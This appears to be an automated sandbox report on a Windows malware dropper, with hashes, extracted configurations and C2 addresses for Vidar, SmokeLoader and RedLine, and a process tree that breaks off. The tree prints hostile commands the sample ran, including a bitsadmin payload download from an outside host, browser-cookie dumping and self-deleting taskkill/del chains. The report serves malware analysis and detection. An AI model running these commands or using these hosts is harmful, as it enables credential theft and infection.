Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    1795s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-07-2021 14:29

General

  • Target

    8 (28).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

redline

Botnet

sel22

C2

salkefard.xyz:80

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • CustAttr .NET packer 1 IoCs

    Detects CustAttr .NET packer in memory.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 33 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 11 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 28 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    1⤵
      PID:1820
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2764
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2708
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2492
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
              1⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2448
            • C:\Users\Admin\AppData\Local\Temp\8 (28).exe
              "C:\Users\Admin\AppData\Local\Temp\8 (28).exe"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:3260
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                2⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1240
                • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\setup_install.exe"
                  3⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1708
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_1.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2388
                    • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_1.exe
                      sonia_1.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of WriteProcessMemory
                      PID:3628
                      • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_1.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_1.exe" -a
                        6⤵
                        • Executes dropped EXE
                        PID:3496
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3756
                    • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_2.exe
                      sonia_2.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      PID:3668
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:964
                    • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_3.exe
                      sonia_3.exe
                      5⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      PID:3732
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 3732 -s 928
                        6⤵
                        • Suspicious use of NtCreateProcessExOtherParentProcess
                        • Program crash
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4788
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1376
                    • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_4.exe
                      sonia_4.exe
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1184
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3540
                    • C:\Users\Admin\AppData\Local\Temp\7zS8D4D7B94\sonia_5.exe
                      sonia_5.exe
                      5⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      PID:3560
                      • C:\Users\Admin\Documents\KiPhMG5yxZO3hK0kGlYOMNnV.exe
                        "C:\Users\Admin\Documents\KiPhMG5yxZO3hK0kGlYOMNnV.exe"
                        6⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:4920
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im KiPhMG5yxZO3hK0kGlYOMNnV.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KiPhMG5yxZO3hK0kGlYOMNnV.exe" & del C:\ProgramData\*.dll & exit
                          7⤵
                            PID:5560
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              8⤵
                              • Executes dropped EXE
                              PID:5528
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im KiPhMG5yxZO3hK0kGlYOMNnV.exe /f
                              8⤵
                              • Kills process with taskkill
                              PID:5632
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              8⤵
                              • Delays execution with timeout.exe
                              PID:5788
                        • C:\Users\Admin\Documents\WoqUbAedhwODTITiRentpAly.exe
                          "C:\Users\Admin\Documents\WoqUbAedhwODTITiRentpAly.exe"
                          6⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:4912
                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4660
                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              8⤵
                                PID:5528
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                • Executes dropped EXE
                                PID:604
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                8⤵
                                  PID:5104
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  8⤵
                                    PID:4184
                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  • Drops file in Program Files directory
                                  PID:4176
                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                  "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Drops startup file
                                  PID:4228
                              • C:\Users\Admin\Documents\grQHlAOeA36hZkWhW2XJEydv.exe
                                "C:\Users\Admin\Documents\grQHlAOeA36hZkWhW2XJEydv.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4900
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 660
                                  7⤵
                                  • Program crash
                                  PID:4160
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 676
                                  7⤵
                                  • Program crash
                                  PID:1424
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 632
                                  7⤵
                                  • Program crash
                                  PID:4868
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 644
                                  7⤵
                                  • Program crash
                                  PID:2520
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 1080
                                  7⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:3292
                              • C:\Users\Admin\Documents\yk29feXXBqH0h2uTL0OQpFVh.exe
                                "C:\Users\Admin\Documents\yk29feXXBqH0h2uTL0OQpFVh.exe"
                                6⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4888
                              • C:\Users\Admin\Documents\ilK9NYDVHN1FIUf_AQtuqpOH.exe
                                "C:\Users\Admin\Documents\ilK9NYDVHN1FIUf_AQtuqpOH.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4876
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 668
                                  7⤵
                                  • Program crash
                                  PID:4156
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 656
                                  7⤵
                                  • Program crash
                                  PID:5104
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 716
                                  7⤵
                                  • Program crash
                                  PID:4288
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 720
                                  7⤵
                                  • Program crash
                                  PID:4376
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 1080
                                  7⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  PID:4324
                              • C:\Users\Admin\Documents\F0SdS9cAXj43D_d6gw80KEYt.exe
                                "C:\Users\Admin\Documents\F0SdS9cAXj43D_d6gw80KEYt.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4860
                                • C:\Users\Admin\Documents\F0SdS9cAXj43D_d6gw80KEYt.exe
                                  "C:\Users\Admin\Documents\F0SdS9cAXj43D_d6gw80KEYt.exe" -a
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4140
                              • C:\Users\Admin\Documents\rYH3ELhxmZ5FwuGE2NbIwFkX.exe
                                "C:\Users\Admin\Documents\rYH3ELhxmZ5FwuGE2NbIwFkX.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4848
                                • C:\Users\Admin\Documents\rYH3ELhxmZ5FwuGE2NbIwFkX.exe
                                  "C:\Users\Admin\Documents\rYH3ELhxmZ5FwuGE2NbIwFkX.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  PID:5660
                              • C:\Users\Admin\Documents\IH3O2xTRVJuUsSEUquUjuoTA.exe
                                "C:\Users\Admin\Documents\IH3O2xTRVJuUsSEUquUjuoTA.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4840
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:1212
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                  • Executes dropped EXE
                                  PID:5712
                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                  7⤵
                                    PID:6096
                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                    7⤵
                                      PID:4008
                                  • C:\Users\Admin\Documents\gzDFs_2Awgoykz3Z9sxVQnzq.exe
                                    "C:\Users\Admin\Documents\gzDFs_2Awgoykz3Z9sxVQnzq.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4828
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5376
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5408
                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      7⤵
                                        PID:5832
                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5880
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5288
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5384
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        7⤵
                                        • Executes dropped EXE
                                        PID:5848
                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                        7⤵
                                          PID:5904
                                      • C:\Users\Admin\Documents\a98bL43XvCG4uf21sb1kG7aS.exe
                                        "C:\Users\Admin\Documents\a98bL43XvCG4uf21sb1kG7aS.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4812
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:5608
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:5920
                                        • C:\Users\Admin\Documents\UKKgATHOEtXAjrjj7KNzF0j5.exe
                                          "C:\Users\Admin\Documents\UKKgATHOEtXAjrjj7KNzF0j5.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4804
                                          • C:\Users\Admin\AppData\Roaming\2174736.exe
                                            "C:\Users\Admin\AppData\Roaming\2174736.exe"
                                            7⤵
                                              PID:4628
                                            • C:\Users\Admin\AppData\Roaming\1031968.exe
                                              "C:\Users\Admin\AppData\Roaming\1031968.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              • Adds Run key to start application
                                              • Suspicious use of SetThreadContext
                                              PID:4700
                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                8⤵
                                                • Executes dropped EXE
                                                PID:5684
                                            • C:\Users\Admin\AppData\Roaming\3430867.exe
                                              "C:\Users\Admin\AppData\Roaming\3430867.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:4316
                                          • C:\Users\Admin\Documents\00ZZ2Fjroem9_WVhevbt4dKl.exe
                                            "C:\Users\Admin\Documents\00ZZ2Fjroem9_WVhevbt4dKl.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            PID:5068
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:5052
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5884
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:5904
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4436
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:4864
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:5816
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5544
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                        7⤵
                                                        • Checks for any installed AV software in registry
                                                        PID:5372
                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                        "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                        7⤵
                                                        • Download via BitsAdmin
                                                        PID:4916
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pZC5l9Pev7eeEDaW -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Drops file in Program Files directory
                                                        PID:5184
                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pmvrnnimkYVDb2OF -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                        7⤵
                                                        • Checks processor information in registry
                                                        PID:6112
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          8⤵
                                                            PID:3960
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:2416
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:6096
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5616
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5536
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:672
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hJIdyb\hJIdyb.dll" hJIdyb
                                                                    7⤵
                                                                    • Loads dropped DLL
                                                                    PID:3356
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hJIdyb\hJIdyb.dll" hJIdyb
                                                                      8⤵
                                                                      • Loads dropped DLL
                                                                      • Drops file in System32 directory
                                                                      • Drops file in Program Files directory
                                                                      PID:5220
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:1036
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5904
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso1C64.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4188
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            8⤵
                                                                            • Executes dropped EXE
                                                                            PID:4456
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
